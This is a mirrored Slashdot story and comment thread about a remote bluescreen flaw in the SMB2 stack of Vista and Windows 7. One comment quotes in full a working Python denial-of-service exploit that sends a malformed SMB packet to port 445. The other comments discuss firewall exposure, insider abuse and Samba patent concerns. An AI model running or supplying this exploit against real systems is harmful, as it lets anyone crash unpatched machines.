Slashdot Mirror

← Back to Stories (view on slashdot.org)

Windows 7 Reintroduces Remote BSoD

Posted by timothy on from the no-such-thing-as-perfect-security dept.

David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."

7 of 427 comments (clear)

  1. Correction! by David+Gerard · · Score: 5, Informative

    I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.

    And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.

    --
    http://rocknerd.co.uk
    1. Re:Correction! by Anonymous Coward · · Score: 4, Informative

      And not exploitable out of the box since SMB and SMBv2 are both firewalled. Yes, if you turn on homegroup, you are opening SMBv2 through the firewall, but only for the private network - so the exploit would need to be coming from another machine at your house. All in all, a nasty issue but won't really affect that many people.

  2. For all who want a more technical summary of TFA: by Seth+Kriticos · · Score: 5, Informative

    Vulnerable systems are all with SMB2 drivers: Vista, W7 and probably Server 2008

    The exploit (which is actually ridiculously simple) goes as follows:

    #!/usr/bin/python
    # When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
    # PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
    from time import sleep

    host = "IP_ADDR", 445
    buff = (
    "\x00\x00\x00\x90" # Begin SMB header: Session message
    "\xff\x53\x4d\x42" # Server Component: SMB
    "\x72\x00\x00\x00" # Negociate Protocol
    "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
    "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    "\x30\x30\x32\x00"
    )
    s = socket()
    s.connect(host)
    s.send(buff)
    s.close()

    Current problem solution: disable the SMB protocol on your infrastructure..

    Now please excuse me, I have go and play a bit with our network admin.. /joke

  3. Re:IP Reasons for SMB2 by eldavojohn · · Score: 4, Informative

    No, it won't. The specs are right here.

    "No, it won't" what? Possibly spell problems for the Samba team? From your link:

    Patents. Microsoft has patents that may cover your implementations of the technologies described in the Open Specifications. Neither this notice nor Microsoft's delivery of the documentation grants any licenses under those or any other Microsoft patents. However, a given Open Specification may be covered by Microsoft's Open Specification Promise (available here: http://www.microsoft.com/interop/osp) or the Community Promise (available here: http://www.microsoft.com/interop/cp/default.mspx). If you would prefer a written license, or if the technologies described in the Open Specifications are not covered by the Open Specifications Promise or Community Promise, as applicable, patent licenses are available by contacting iplg@microsoft.com ...

    Emphasis mine. So I'll correct myself, it may spell trouble for the Samba team. It's not clear. Which is essentially what I said. Do you really think iplg@microsoft.com will grant the Samba team a written license or possibly a patent license?

    Why do they use the ambiguous language quoted above if this is an open technology I'm not suppose to fear implementing? I mean, haven't we been threatened over this sort of thing before? It's not clear to me why Microsoft stops other products from interfacing with theirs (product lock in?) but I'm not about to give them the benefit of the doubt.

    --
    My work here is dung.
  4. Re:Not consistent by Lulfas · · Score: 5, Informative

    It's because SMB and SMBv2 are firewalled straight out of the box. You have to turn on homegroup and then attempt to exploit. Not quite the "OMG SKY IS FALLING" that the summary leads us to believe.

  5. Re:Local? by afidel · · Score: 4, Informative

    What about the employee who just got fired who sets off an IP walk that crashes every file server? What about the employee that gets the malware of the day and it includes the ability for the 0wner to launch this attack inside your LAN? There's a lot more potential for abuse than just the prankster on the helpdesk deciding he wants to create some havoc.

    --
    There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now.
  6. Re:Please grow up, you're driving us away by Ash-Fox · · Score: 5, Informative

    I cannot join in with the Linux community because of you people.

    I'm sorry, Sir. This is not the Linux community, this is the Slashdot community.

    If you want the Linux community, go to http://www.kernel.org/

    I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.

    If you look on kernel.org, there is none of this garbage. You are mistaken.

    --
    Change is certain; progress is not obligatory.